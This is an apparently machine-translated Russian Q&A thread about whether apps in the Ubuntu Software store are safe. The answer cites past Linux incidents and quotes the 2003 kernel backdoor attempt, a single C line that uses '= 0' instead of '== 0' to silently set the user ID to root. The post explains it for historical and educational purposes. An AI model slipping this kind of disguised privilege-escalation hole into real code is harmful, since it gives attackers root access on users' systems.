Программное обеспечение Ubuntu (магазин / приложение) - всегда безопасно?
Я новичок в Ubuntu. Только что получил свой первый ноутбук под управлением Ubuntu. Абсолютно нравится, но у меня есть вопрос, когда я запускаю приложение - Ubuntu Software - где я могу просматривать по категориям или видеть выбор редактора, все ли программное обеспечение здесь проверено? Придется ли мне когда-нибудь беспокоиться о том, что здесь перечислены потенциально вредоносные программы?
TIA!
1 ответ
все ли программное обеспечение здесь проверено?
Да, но это также автоматизированный процесс, который ищет определенный вид кода. Внизу пример бэкдора, а также причина, по которой его трудно найти.
И большая часть проверки выполняется пользователями (или, по крайней мере, пользователем) этого программного обеспечения. Было несколько инцидентов. Вот 3 диапазона с 2003 по 2013 год:
- http://freedom-to-tinker.com/2013/10/09/the-linux-backdoor-attempt-of-2003/
- https: // Freedom -to-tinker.com/2013/09/20/software-transparency-debian-openssl-bug/
- http://www.omgubuntu.co.uk/2013/11/nsa-ask-linus-torvalds- include-backdoors-linux-отец-говорит-да
Обычно вы можете ожидать шума, когда пользователь обнаруживает проблему с программным обеспечением. Вот почему мы используем открытый исходный код: вы можете закодировать бэкдор, вы можете встроить его в программное обеспечение, но вы не можете полностью скрыть бэкдор. В какой-то момент кто-то заметит этот бэкдор. Либо исследуя код, либо наблюдая, как что-то происходит в их системе.
Помните, что это также причина того, почему большая группа пользователей, использующих Linux, отказывается устанавливать драйверы с закрытым исходным кодом. Никогда не знаешь, что находится внутри кода с закрытым исходным кодом. В нем могут быть бэкдоры или вредоносное ПО.
Могу ли я когда-нибудь беспокоиться о потенциальных вредоносных программах, перечисленных здесь?
В какой-то момент нам всем нужно начать кому-то доверять, и послужной список Canonicals намного лучше, чем Microsoft или Apple.
Отсутствие серверов на вашем собственном компьютере смягчает почти все ваши проблемы.
Вы никогда не можете быть уверены на 100%, но, возможно, лучше сосредоточиться на других вопросах. Например, ваш интернет-провайдер записывает все, что вы делаете в сети. Это гораздо более вероятно. Или кто-то взломал вашу машину, используя ваш пароль.
===
Из 1-й ссылки: человек по имени Ларри МакВой заметил изменение в программном обеспечении под названием bitkeeper. Проблема в единственном = . Так что это довольно сложно найти, если только вы не увидите что-то странное, как он: он нашел это из-за нарушений в журнале изменений. Изменение было ...
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
Ни один пользователь не допустил, чтобы это изменение было внесено, и, поскольку оно было зарегистрировано странным образом, предполагается, что кто-то пытался вставить это намеренно в качестве бэкдора. И у него также есть объяснение:
Обычное чтение экспертом интерпретировало бы это как безобидный код проверки ошибок, заставляющий wait4 возвращать код ошибки, когда wait4 был вызван определенным образом, что было запрещено документацией. Но действительно внимательный опытный читатель заметит, что ближе к концу первой строки написано «= 0», а не «== 0». Обычно в таком коде пишется «== 0», который проверяет, равен ли идентификатор пользователя текущего выполняемого кода (current-> uid) нулю, без изменения идентификатора пользователя. Но на самом деле появляется «= 0», что приводит к установке идентификатора пользователя на 0.
В основном это добавляет параметры WCLONE и WALL, которые изменяют идентификатор пользователя на root. Это то, что вы можете назвать бэкдором :)